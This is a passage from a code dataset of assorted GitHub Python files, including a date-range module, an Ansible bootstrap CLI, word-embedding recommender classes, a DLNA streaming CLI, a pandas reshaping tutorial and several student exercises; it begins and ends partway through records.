typing.Mapping[str, typing.Any]]\n ]:\n inputs: typing.Dict[str, typing.Dict[str, typing.Any]] = {\n \"date\": {\"type\": \"date\", \"doc\": \"The date to check.\"},\n \"earliest\": {\n \"type\": \"date\",\n \"doc\": \"The earliest date that is allowed.\",\n \"optional\": True,\n },\n \"latest\": {\n \"type\": \"date\",\n \"doc\": \"The latest date that is allowed.\",\n \"optional\": True,\n },\n }\n\n return inputs\n\n def create_output_schema(\n self,\n ) -> typing.Mapping[\n str, typing.Union[ValueSchema, typing.Mapping[str, typing.Any]]\n ]:\n outputs = {\n \"within_range\": {\n \"type\": \"boolean\",\n \"doc\": \"A boolean indicating whether the provided date was within the allowed range ('true'), or not ('false')\",\n }\n }\n return outputs\n\n def process(self, inputs: ValueSet, outputs: ValueSet) -> None:\n\n from dateutil import parser\n\n d = inputs.get_value_data(\"date\")\n earliest: typing.Optional[datetime.datetime] = inputs.get_value_data(\"earliest\")\n latest: typing.Optional[datetime.datetime] = inputs.get_value_data(\"latest\")\n\n if not 
earliest and not latest:\n outputs.set_value(\"within_range\", True)\n return\n\n if hasattr(d, \"as_py\"):\n d = d.as_py()\n\n if isinstance(d, str):\n d = parser.parse(d)\n\n if earliest and latest:\n matches = earliest <= d <= latest\n elif earliest:\n matches = earliest <= d\n else:\n matches = d <= latest\n\n outputs.set_value(\"within_range\", matches)\n","repo_name":"DHARPA-Project/kiara_modules.core","sub_path":"src/kiara_modules/core/date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8195656380","text":"from typing import List\n\nfrom click import Context, argument\nfrom jbhannah.infrastructure import logger\nfrom jbhannah.infrastructure.ansible.playbook import run_playbook\nfrom jbhannah.infrastructure.click import proxy_command, verbose_option\n\nBOOTSTRAP_ENV = {\n \"ANSIBLE_HOST_KEY_CHECKING\": \"false\",\n \"ANSIBLE_TRANSPORT\": \"paramiko\"\n}\n\n\n@proxy_command()\n@argument(\"selectors\", nargs=-1, required=True)\n@verbose_option(logger)\nasync def bootstrap(ctx: Context, selector_list: List[str]):\n \"\"\"Bootstrap one or more remote hosts.\"\"\"\n logger.debug(\"Bootstrapping host selectors {selectors}\".format(\n selectors=\", \".join(selector_list)))\n await run_playbook(\"bootstrap\",\n selector_list,\n *ctx.args,\n env=BOOTSTRAP_ENV)\n","repo_name":"jbhannah/infrastructure","sub_path":"src/jbhannah/infrastructure/cli/bootstrap.py","file_name":"bootstrap.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"43568890214","text":"s = input(\"string: \")\n\nm = 0, 0 # (character, count) of the longest run\nfor i, c in enumerate(s):\n count = 0\n while i + count < len(s) and c == s[i + count]:\n count += 1\n if count >= m[1]:\n m = (c, count)\n\nprint(m[0], m[1])\n\n\n ","repo_name":"Nikappa57/my-sapienza-experience","sub_path":"Introduzione alla programmazione/LabPython06/A_Ex5.py","file_name":"A_Ex5.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"3693788192","text":"from gensim.models import Word2Vec, KeyedVectors\nfrom gensim.parsing.preprocessing import strip_multiple_whitespaces, strip_punctuation, strip_tags\nimport pandas as pd\nfrom sklearn.preprocessing import normalize\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport networkx as nx\nimport numpy as np\nimport scipy\n\nclass EmbeddingVectorSpace:\n\n def __init__(self, df_item_origin=None, df_ratings = None):\n '''\n self._word2vect_model = KeyedVectors.load_word2vec_format(\n '/home/ignacio/Datasets/Word Embeddings Pretrained Vectors/Word2Vec/GoogleNews-vectors-negative300.bin',\n binary=True)\n '''\n self._word2vect_model = KeyedVectors.load_word2vec_format(\n '/home/ignacio/Datasets/Word Embeddings Pretrained Vectors/GLoVe/glove-w2v.840B.300d.txt', binary=False)\n self._word2vect_model.init_sims(replace=True)\n self._df_item_origin = df_item_origin.copy()\n self._users_profile = {}\n self._origin_embeddings = None\n self._df_ratings = df_ratings\n\n #Methods to get embeddings\n def process_description(self, description):\n description = description.lower()\n description = strip_punctuation(description)\n description = strip_tags(description)\n description = strip_multiple_whitespaces(description)\n description = description.split(' ')\n description_clean = list(filter(lambda x: 
x in self._word2vect_model.vocab, description))\n return description_clean\n\n def process_authors(self, authors):\n authors = authors.split(' ')\n author_clean = list(filter(lambda x: x in self._word2vect_model.vocab, authors))\n return author_clean\n\n def get_w2vec(self, soap):\n # vector space of embeddings\n w2v = np.zeros((300,))\n for s in soap:\n w2v += self._word2vect_model.wv[s]\n return w2v / len(soap)\n\n def origin_embedding_space(self):\n self._df_item_origin['description'] = self._df_item_origin['description'].apply(self.process_description)\n self._df_item_origin['genres'] = self._df_item_origin['genres'].str.replace('|', ' ')\n self._df_item_origin['genres'] = self._df_item_origin['genres'].apply(self.process_description)\n self._df_item_origin['director emb'] = self._df_item_origin['director'].str.replace(',', '')\n self._df_item_origin['director emb'] = self._df_item_origin['director emb'].apply(self.process_authors)\n self._df_item_origin['soap'] = self._df_item_origin['description'] + self._df_item_origin['genres'] + self._df_item_origin['director emb']\n origin_embeddings = self._df_item_origin['soap'].apply(self.get_w2vec)\n self._origin_embeddings = np.stack(origin_embeddings)\n return self._origin_embeddings\n\n\n # Methods to get user vector space\n def get_item_profile(self, item_id, matrix):\n idx = self._df_item_origin.index[self._df_item_origin['movieId'] == item_id].tolist()[0]\n item_profile = matrix[idx:idx + 1]\n return item_profile.reshape((-1,))\n\n def get_item_profiles(self, ids, matrix):\n item_profiles_list = [self.get_item_profile(x, matrix) for x in ids]\n item_profiles = np.stack(item_profiles_list)\n return item_profiles\n\n def build_user_profile(self, items_id, user_rating_weigth, matrix):\n user_item_profiles = self.get_item_profiles(items_id, matrix)\n user_item_strengths_weighted_avg = np.sum(np.multiply(user_item_profiles, user_rating_weigth), axis=0) / np.sum(\n user_rating_weigth)\n user_profile_norm = normalize(user_item_strengths_weighted_avg.reshape((1,-1)))\n return user_profile_norm\n\n def build_users_profiles(self):\n users_id = self._df_ratings['userId'].unique()\n for user_id in users_id:\n items_id = (self._df_ratings[self._df_ratings['userId'] == user_id]['movieId']).values\n user_rating_weigth = (self._df_ratings[self._df_ratings['userId'] == user_id]['rating']).values.reshape(-1,1)\n self._users_profile[user_id] = self.build_user_profile( items_id, user_rating_weigth, self._origin_embeddings)\n return self._users_profile\n\n\nclass EmbeddingVectorTargetSpace(EmbeddingVectorSpace):\n\n def __init__(self, df_item_origin=None, df_item_target=None, df_ratings = None):\n super().__init__(df_item_origin=df_item_origin, df_ratings=df_ratings)\n self._df_item_target = df_item_target.copy()\n self._target_embeddings = None\n\n\n def target_embedding_space(self):\n self._df_item_target['description'] = self._df_item_target['description'].fillna('no description')\n self._df_item_target['description'] = self._df_item_target['description'].apply(self.process_description)\n self._df_item_target['common-shelves'] = self._df_item_target['common-shelves'].str.replace('|', ' ')\n self._df_item_target['common-shelves'] = self._df_item_target['common-shelves'].apply(self.process_description)\n self._df_item_target['Book-Author emb'] = self._df_item_target['Book-Author'].apply(self.process_authors)\n self._df_item_target['soap'] = self._df_item_target['description'] + self._df_item_target['common-shelves'] + self._df_item_target['Book-Author 
emb']\n target_embeddings = self._df_item_target['soap'].apply(super().get_w2vec)\n self._target_embeddings = np.stack(target_embeddings)\n return self._target_embeddings\n","repo_name":"ignaciogatti/CrossDomRecSys","sub_path":"space_model/EmbeddingVectorSpace.py","file_name":"EmbeddingVectorSpace.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"40195358525","text":"# List vs Tuple\n\n# Some functions used in Tuple\n'''\n\n1. len()\n2. min()\n3. max()\n4. sum()\n5. any()\n6. all()\n7. sorted()\n\n\n\n# Methods not use in Tuple\n\n1. append()\n2. insert()\n3. remove()\n4. pop()\n5. clear()\n6. sort()\n7. reverse()\n\n'''\n\n# You can create list inside tuple and vice-versa\n\nlst = [1,(2,3),4,5]\ntpl = ([1,2],3,4,5)\nprint(lst,tpl)","repo_name":"devankit01/Python-DSA","sub_path":"Tuple/6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33437769031","text":"#User function Template for python3\n\nclass Solution:\n def isDigitSumPalindrome(self,N):\n N = str(N)\n sum = 0\n for i in (N):\n sum += int(i) \n sum = str(sum)\n \n return 1 if sum[::-1] == sum else 0 \n \n #code here\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__=='__main__':\n t=int(input())\n for _ in range(t):\n N=int(input())\n ob=Solution()\n print(ob.isDigitSumPalindrome(N))\n# } Driver Code Ends","repo_name":"AbdulMo007/Leetcode-Submissions","sub_path":"Sum of Digit is Pallindrome or not - GFG/sum-of-digit-is-pallindrome-or-not.py","file_name":"sum-of-digit-is-pallindrome-or-not.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24503079289","text":"def getImageFromElementCSS(element):\n styles = str(element).split(';')\n if styles:\n matches = []\n for style in styles:\n if style.startswith('background-image'):\n matches.append(style)\n return matches[0].split('(')[1].split(\")\")[0]\n else:\n return ''","repo_name":"codekeyz/joynews-web-scraper","sub_path":"joyscraper/_utils.py","file_name":"_utils.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11406295267","text":"# -*- coding: utf-8 -*-\nimport allure\n\nfrom model.group import Group\n\n\ndef test_add_group(app, db, json_groups, check_ui):\n group = json_groups\n with allure.step('Given a group list'):\n list_before = db.get_group_list()\n with allure.step('When i add a group %s to the list' % group):\n app.group.create(group)\n with allure.step('Then a new group list is equal the old list with added group'):\n list_after = db.get_group_list()\n list_before.append(group)\n assert sorted(list_before, key=Group.id_or_max) == sorted(list_after, key=Group.id_or_max)\n if check_ui:\n assert sorted(list_after, key=Group.id_or_max) == sorted(app.group.get_group_list(), key=Group.id_or_max)\n","repo_name":"SergeyDorokhov/python_training","sub_path":"tests/test_add_group.py","file_name":"test_add_group.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9026476471","text":"import asyncio\nfrom cmd.config import set_env\nfrom cmd.di import Container\n\nfrom dependency_injector.wiring import Provide, inject\nfrom 
domain.helpers.constants import (QUEUE_MANAGE_MODELS, QUEUE_TRAINING_NLP, SUBSCRIPTION_REMOVE_MODELS, SUBSCRIPTION_REMOVE_MODELS_BY_USER,\n SUBSCRIPTION_TRAINING_MODEL_COMMAND)\nfrom domain.usecases.notifications_usecase import EventNotificationUsecase\nfrom domain.usecases.storage_models_usecase import StorageModelsUsecase\nfrom domain.usecases.training_usecase import TrainingUsecase\nfrom infraestructure.messaging.controller.handlers import \\\n ControllerSubscriptions\nfrom infraestructure.messaging.natsImp import NatsImp\nfrom domain.helpers.loggers import logger\nset_env()\n\n@inject\nasync def main(training_usecase: TrainingUsecase = Provide[Container.training_usecase],\n storage_usecase: StorageModelsUsecase = Provide[Container.storage_usecase],\n notification_usecase: EventNotificationUsecase = Provide[Container.notification_usecase]):\n\n controllers_instance = ControllerSubscriptions(\n training_usecase, storage_usecase, notification_usecase)\n\n # NATS client listens for connections\n nats_instance = NatsImp()\n await nats_instance.set_up()\n client = nats_instance.client\n logger.info(\"training nlp start!!\")\n # subscribers\n await client.subscribe(SUBSCRIPTION_TRAINING_MODEL_COMMAND, queue=QUEUE_TRAINING_NLP, cb=controllers_instance.training_model_handler)\n await client.subscribe(SUBSCRIPTION_REMOVE_MODELS, queue=QUEUE_MANAGE_MODELS, cb=controllers_instance.delete_models_by_trainig_id)\n await client.subscribe(SUBSCRIPTION_REMOVE_MODELS_BY_USER, queue=QUEUE_MANAGE_MODELS, cb=controllers_instance.delete_models_by_user_id)\n\n\nif __name__ == '__main__':\n container = Container()\n container.init_resources()\n container.wire(modules=[__name__])\n\n loop = asyncio.get_event_loop()\n try:\n asyncio.ensure_future(main())\n loop.run_forever()\n finally:\n loop.close()\n","repo_name":"LuisDiazM/nlp-chatbots","sub_path":"backend/training-nlp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"23446646346","text":"# Count of distinct sums of consecutive subsequences\n# How many distinct numbers can be made as \"sums of consecutive subsequences\" of the \"circular sequence\"\ntmp_answer = set()\n\ndef solution(elements):\n size = len(elements)\n for start_idx in range(len(elements)) :\n sum_num = 0\n for length in range(size) :\n sum_num += elements[(start_idx+length) % size]\n tmp_answer.add(sum_num)\n return len(tmp_answer)\n\nprint(solution([7, 9, 1, 1,4]))","repo_name":"JoungMinJu/PyCodingTest","sub_path":"Programmers/continuous.py","file_name":"continuous.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8920869680","text":"def permutaciones(cadena):\r\n p = factorial(len(cadena)) # number of permutations\r\n # print(p)\r\n n = len(cadena) # length of the string\r\n # print(n)\r\n # print(factorial(len(cadena)-1))\r\n i = 0 # index counter, goes up to p (from 0 to p-1)\r\n # create the list with the number of slots to be filled by the p permutations\r\n char_list = [\" \"]*p\r\n #print(char_list)\r\n\r\n \"\"\"for j in range (1,n+1):\r\n for x in range(n):\r\n for i in range(x*factorial(n-j), (x+1)*factorial(n-j)):\r\n if cadena[x] not in char_list[i]:\r\n char_list[i] = char_list[i]+cadena[x]\"\"\"\r\n new_char_list = arreglos(cadena, n, char_list)\r\n\r\n # x=0\r\n #char_list[i] = cadena[x] + cadena[x]\r\n\r\n return new_char_list\r\n\r\n\r\ndef arreglos(cadena, n, char_list):\r\n for j in range(1, n+1):\r\n for x in range(n):\r\n 
for i in range(x*factorial(n-j), (x+1)*factorial(n-j)):\r\n if cadena[x] not in char_list[i]:\r\n char_list[i] = char_list[i]+cadena[x]\r\n if n == 0:\r\n return char_list\r\n arreglos(cadena, n-1, char_list)\r\n return char_list\r\n\r\n\r\ndef factorial(n):\r\n f = 1\r\n for i in range(1, n+1):\r\n f = f*i\r\n return f\r\n\r\n\r\ncadena = (\"abcd\")\r\n\r\nresultado = permutaciones(cadena)\r\n\r\nprint(resultado)\r\n","repo_name":"Chuchinbad/VS-code","sub_path":"permitaciones.py","file_name":"permitaciones.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"21830351839","text":"import csv\n\nimport matplotlib.pyplot as plt\n\"\"\"Visual data analysis - Comparing the highest and lowest daily temperatures in Sitka and Death Valley\"\"\"\n\n\n\"\"\"Import of modules: csv, matplotlib and datetime\"\"\"\n\nfrom datetime import datetime\n\n\"\"\"Assign a csv file name to a variable\"\"\"\nfilename = 'sitka_weather_2014.csv' \n\n\"\"\"Opening a file as an alias\"\"\"\nwith open(filename) as f_obj:\n \"\"\"Assign a csv.reader to a variable, passing f_obj\"\"\"\n reader = csv.reader(f_obj)\n\n \"\"\"Reading headers using the next method\"\"\"\n header_row = next(reader)\n \"\"\"Create empty lists\"\"\"\n highs = []\n lows = []\n dates = []\n\n \"\"\"Iteration in reader for date, high and low data\"\"\"\n for row in reader:\n try:\n date = datetime.strptime(row[0], \"%Y-%m-%d\") #use datetime.strptime to parse the formatted date\n high = (int(row[1]))\n low = (int(row[3]))\n except ValueError: #In case there is no data, we report an error\n print(date, 'No data.')\n else:\n dates.append(date)\n highs.append(high) \n lows.append(low)\n\nfilename_2 = 'death_valley_2014.csv'\nwith open(filename_2) as f_obj_2:\n reader_2 = csv.reader(f_obj_2)\n header_row_2 = next(reader_2)\n\n highs_2 = []\n lows_2 = []\n dates_2 = []\n\n for row in reader_2:\n try:\n date_2 = datetime.strptime(row[0], \"%Y-%m-%d\")\n high_2 = (int(row[1]))\n low_2 = (int(row[3]))\n except ValueError:\n print(date_2, 'No data.')\n else:\n dates_2.append(date_2)\n highs_2.append(high_2) \n lows_2.append(low_2)\n\n\n\n fig = plt.figure(dpi=128, figsize=(10,6))\n plt.plot(dates, highs, c='red', alpha=0.6)\n plt.plot(dates, lows, c='blue', alpha=0.6)\n plt.fill_between(dates, highs, lows, facecolor='blue', alpha=0.1)\n plt.plot(dates_2, highs_2, c='green')\n plt.plot(dates_2, lows_2, c='yellow')\n plt.fill_between(dates_2, highs_2, lows_2, facecolor='green', alpha=0.1)\n plt.title(\"Highest and lowest daily temperature - 2014\", fontsize=20)\n fig.autofmt_xdate()\n plt.ylabel('Temperature (F)', fontsize=16)\n plt.tick_params(axis='both', which='major', labelsize=12)\n\n plt.show()","repo_name":"TKdev96/Visual-data-analysis-in-python","sub_path":"comparison_temp_sitka_vs_death_valley.py","file_name":"comparison_temp_sitka_vs_death_valley.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"31722738010","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\n\nimport argparse\nimport json\nimport os\nimport sys\n\nfrom . 
import devices, dlna, streaming\n\n\ndef get_subtitle(file_video):\n\n video, extension = os.path.splitext(file_video)\n\n file_subtitle = \"{0}.srt\".format(video)\n\n if not os.path.exists(file_subtitle):\n return None\n return file_subtitle\n\n\ndef list_devices(args):\n\n my_devices = devices.get_devices(args.timeout)\n\n for i, device in enumerate(my_devices, 1):\n print(\"Device {0}:\\n{1}\\n\\n\".format(i, json.dumps(device, indent=4)))\n\n\ndef play(args):\n\n # Get video and subtitle file names\n\n files = {\"file_video\": args.file_video}\n\n if args.use_subtitle:\n\n if not args.file_subtitle:\n args.file_subtitle = get_subtitle(args.file_video)\n\n if args.file_subtitle:\n files[\"file_subtitle\"] = args.file_subtitle\n\n # Select device to play\n device = None\n\n if args.device_url:\n device = devices.register_device(args.device_url)\n else:\n my_devices = devices.get_devices(args.timeout)\n\n if len(my_devices) > 0:\n if args.device_query:\n device = [\n device for device in my_devices\n if args.device_query.lower() in str(device).lower()][0]\n else:\n device = my_devices[0]\n\n if device:\n print('Start streaming on device: ' + device['location'])\n else:\n sys.exit(\"No devices found.\")\n\n # Configure streaming server\n\n target_ip = device[\"hostname\"]\n serve_ip = streaming.get_serve_ip(target_ip)\n\n if args.file_video.startswith('http://') or args.file_video.startswith('https://'):\n files_urls = files\n else:\n files_urls = streaming.start_server(files, serve_ip)\n \n print(files_urls)\n\n # Play the video through DLNA protocol\n\n dlna.play(files_urls, device)\n\n\ndef run():\n\n parser = argparse.ArgumentParser(\n description=\"A minimal UPnP/DLNA media streamer.\")\n parser.add_argument(\"-t\", \"--timeout\", type=float, default=5)\n subparsers = parser.add_subparsers(dest=\"subparser_name\")\n\n p_list = subparsers.add_parser('list')\n p_list.set_defaults(func=list_devices)\n\n p_play = subparsers.add_parser('play')\n p_play.add_argument(\"-d\", \"--device\", dest=\"device_url\")\n p_play.add_argument(\"-q\", \"--query-device\", dest=\"device_query\")\n p_play.add_argument(\"-s\", \"--subtitle\", dest=\"file_subtitle\")\n p_play.add_argument(\"-n\", \"--no-subtitle\",\n dest=\"use_subtitle\", action=\"store_false\")\n p_play.add_argument(\"file_video\")\n p_play.set_defaults(func=play)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n\n run()\n","repo_name":"pimpreneil/nano-dlna","sub_path":"nanodlna/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"37054627500","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.1\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# ### Prepared by Abhishek Kumar\n# ### https://www.linkedin.com/in/abhishekkumar-0311/\n#\n\n# +\n# To get multiple outputs in the same cell\n\nfrom IPython.core.interactiveshell import InteractiveShell\nInteractiveShell.ast_node_interactivity = \"all\"\n\n# +\n# Import the required libraries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n# %matplotlib inline\n# -\n\n# # Wide to Long DataFrame\n# One record to many records based on a ID column\n#\n# ```py\n# 1. df.melt(id_vars=[ ], value_vars=[ ], var_name=[ ], value_name=[ ])\n# 2. 
pd.wide_to_long(df, i=[ ], j=[ ], stubnames=[ ], sep=\"_\") \n# # stubnames provides the flexibility to add the multiple sets of series of variables```\n# apply reset_index() to flatten out the indices and make the it more usable.\n#\n\n# ## df.melt()\n\ndf = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [200,180],\n 'prem3' : [300,80],})\ndf\n\ndf_melted = df.melt(id_vars=['id','name']).sort_values('id')\ndf_melted\n\ndf2 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],})\ndf2\n\ndf2_melted = df2.melt(id_vars=['id','name'], var_name = 'month', value_name = 'premiums').sort_values('id')\ndf2_melted\n\n# +\n# df2_melted = df2_melted.loc[]\n\n# +\ndf3 = df2.copy()\n\ndf3_melted = df3.melt(id_vars=['id'], value_vars=['prem1','prem2','prem3'], var_name = 'month', value_name = 'premiums').sort_values('id')\ndf3_melted\n# -\n\n# ### Example 2\n\n# +\n# Setup : DataFrame creation\n\nsalary = [['1','Abhishek Kumar','AIML', 'Machine Learning Engineer','M', 'Y', '04051990', 1121000],\n ['2','Arjun Kumar','DM', 'Tech Lead','M', 'Y', '09031992', 109000],\n ['3','Vivek Raj','DM', 'Devops Engineer','M', 'N', np.NaN , 827000],\n ['4','Mika Singh','DM', 'Data Analyst','F', 'Y', '15101991', np.NaN],\n ['5','Anusha Yenduri','AIML', 'Data Scientist','F', 'Y', '01011989', 921000],\n ['6','Ritesh Srivastava','AIML', 'Data Engineer','M', 'Y', np.NaN, 785000]]\n\ncolumns_name=['Emp_Id','Emp_Name','Department','Role','Gender', 'WFH Status', 'DOB', 'Salary']\n\nemp_df = pd.DataFrame(salary,columns=columns_name)\nemp_df\n\n# +\n# Sample data set-up\n\nemp_df_1 = emp_df.copy()\n\nemp_df_1['Holi_Bonus'] = emp_df_1['Salary']*0.05\nemp_df_1['Diwali_Bonus'] = emp_df_1['Salary']*0.075\nemp_df_1['Yearly_Bonus'] = emp_df_1['Salary']*0.10\nemp_df_1\n# -\n\nemp_df_1_long = emp_df_1.melt(id_vars = ['Emp_Id','Emp_Name'] , \n value_vars = [ 'Holi_Bonus','Diwali_Bonus','Yearly_Bonus' ],\n var_name = 'Event',\n value_name = 'Bonus' )\nemp_df_1_long\n\n# ## pd.wide_to_long()\n\ndf4 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],\n 'disc1' : [20,40],\n 'disc2' : [np.NaN,30],\n 'disc3' : [50,np.NaN],})\ndf4\n\n# +\n# melt is not working as expected.\n# There are 2 sets of sequential columns and both the sets are transposed to the same column\n# NOT Working as EXPECTED\n\n# df4_melted = df4.melt(id_vars=['id','name'], value_vars=['prem1','prem2','prem3','disc1','disc2','disc3'], var_name = 'month', value_name = 'values').sort_values('id').reset_index(drop='index')\n# df4_melted\n# -\n\n# #### Another way to transform is to use the wide_to_long() panel data convenience function. It is less flexible than melt(), but more user-friendly.\n\ndf4_melted1 = pd.wide_to_long(df4, i=['id','name'], j='month', stubnames=['prem','disc'])\ndf4_melted1\n\ndf4_melted1.reset_index(inplace=True)\ndf4_melted1\n\n# +\n# Trying to see the usage of suffix= parameter. Not completed yet.\n# df4_melted2 = pd.wide_to_long(df4, i=['id','name'], j='month', stubnames=['prem','disc'])#, suffix='1')\n# df4_melted2\n# -\n\n# ## df.stack()\n\ndf5 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN]})\ndf5\n\ndf5.set_index(['id','name']).stack().reset_index()\n\n# > 1. Important thing to note - there is single series of variable (perm1 - perm3), which is transposed here.\n# > 2. 
The index is set before the process of stacking.\n# > 3. If there is multile sets of series of variables, then this would not work as expected.\n# > 4. By default, dropna = True, and hence it drops the NaN values\n\ndf5.set_index(['id','name']).stack(dropna=False).reset_index()\n\ndf6 = pd.DataFrame({'id': [1,2],\n 'name': ['a','b'],\n 'prem1' : [100,280],\n 'prem2' : [np.NaN,180],\n 'prem3' : [300,np.NaN],\n 'disc1' : [20,40],\n 'disc2' : [np.NaN,30],\n 'disc3' : [50,np.NaN]})\ndf6\n\ndf6_stacked = df6.set_index(['id','name']).stack().reset_index()\ndf6_stacked\n\n# +\n# stack is not working as expected.\n# There are 2 sets of sequential columns and both the sets are transposed to the same column\n# NOT Working as EXPECTED\n# -\n\n\n\n# # Long to Wide DataFrame\n# Multiple records per ID to a single(one) record of each ID.\n#\n# ```python\n# 1. pd.pivot()\n# 2. pd.pivot_table()\n# 3. Use df.set_index([id_vars columns and var_name columns]) and chain it with .unstack(level=2 (here))```\n\n# ### pd.pivot() - Does not work for multiple indexes, So in this case, does not work\n\n# ### pd.pivot_table() - Although it is for aggregation, it worked to change LONG to WIDE Data\n\ndf4_melted1\n\ndf_wide = pd.pivot_table(df4_melted1, index=['id','name'], columns='month', values=['prem','disc'])\ndf_wide\n\ndf_wide.columns\n\n# +\n# df_wide = df4_melted1.pivot(index=['id','name'], columns='month', values=['prem'])\n# df_wide\n# -\n\ndf_wide.columns = ['_'.join(map(str, tup)) for tup in df_wide.columns]\ndf_wide.reset_index()\n\n# ### df.unstack() - \n# #### Use df.set_index([id_vars columns and var_name columns]) and chain it with .unstack(level=2 (here))\n\nwide_df = df4_melted1.set_index(['id','name','month']).unstack(level=2)\nwide_df\n\n# ID: level = 0; RegionVariable: level = 1; 'EXP': level = 2; 'ModelID': level = 3;\n\nwide_df.columns\n\n# +\n# Code to flatten the list and at the same time concatenating it.\n\nwide_df.columns = ['_'.join(map(str, tup)) for tup in wide_df.columns] # Everything is back to the first dataframe\n# -\n\nwide_df.columns\n\nwide_df\n\nwide_df.reset_index()\n\n\n\n# ### Example 2\n\nemp_df_1_long\n\nemp_df_1_wide_1 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus' ).reset_index()\nemp_df_1_wide_1\n\nemp_df_1_wide_2 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n margins = True ).reset_index() # default aggfunc = 'mean'\nemp_df_1_wide_2\n\nemp_df_1_wide_3 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n margins = True,\n aggfunc = 'sum').reset_index()\nemp_df_1_wide_3\n\n# +\n# Only row-wise aggregation\n\nemp_df_1_wide_4 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name']) # default aggfunc = 'mean'\nemp_df_1_wide_4\n# -\n\nemp_df_1_wide_4 = emp_df_1_long.pivot_table(index = ['Emp_Id','Emp_Name'] ,\n columns = 'Event',\n values = 'Bonus',\n fill_value = 1000)\nemp_df_1_wide_4\n\n# ### There are other techniques that enables Re-Shaping of dataframes.\n#\n# i. pivot()\n# ii. stack() & unstack()\n# iii. wide_to_long()\n# iv. crosstab()\n# v. 
cut()\n\n\n","repo_name":"AbhishekKumar-0311/Machine-Learning-with-Python","sub_path":"Pandas/Learning_Pandas_Part_5_Reshaping.py","file_name":"Learning_Pandas_Part_5_Reshaping.py","file_ext":"py","file_size_in_byte":8475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"42568562604","text":"# Create a method that decrypts reversed-lines.txt\n\ndef decrypt(file_rev):\n try:\n with open(file_rev, \"r\") as f:\n with open(file_reversed, \"w\") as rev:\n text = f.readlines()\n for i in text:\n rev.write(i[0:-1][::-1] + \"\\n\")\n return \"Reversing done!\"\n except IOError:\n return \"Unable to open file!\"\n\nfile_rev = \"reversed-lines.txt\"\nfile_reversed = \"reverse-done.txt\"\nprint(decrypt(file_rev))","repo_name":"green-fox-academy/Bpatrik83","sub_path":"week-03/day-02/08_reversed_lines.py","file_name":"08_reversed_lines.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21776694493","text":"import os\nfrom json import dumps\nfrom datetime import datetime, timedelta\nimport csv\nimport dateutil.parser as dp\n\n\nDatarates = [\"SF12BW125\", \"SF11BW125\", \"SF10BW125\",\"SF9BW125\", \"SF8BW125\", \"SF7BW125\"]\ncurrent_directory = os.getcwd()\ntestpayload = bytearray( b'\\x02\\x01\"\\x04\\x8d\\xfcn\\x00 \\x03\\x90\\xfco\\x00\\x1e\\x03\\x8d\\xfcp\\x00\"\\x03\\x90\\xfcn\\x00\"\\x03\\x8e\\xfcq\\x00!\\x03\\x8e\\xfcl\\x00!\\x03\\x8d\\xfcn\\x00 \\x03\\x8e\\xfcq')\n\ndef WritePayloadDataToFile(dev_id, port, payload, Metadata, 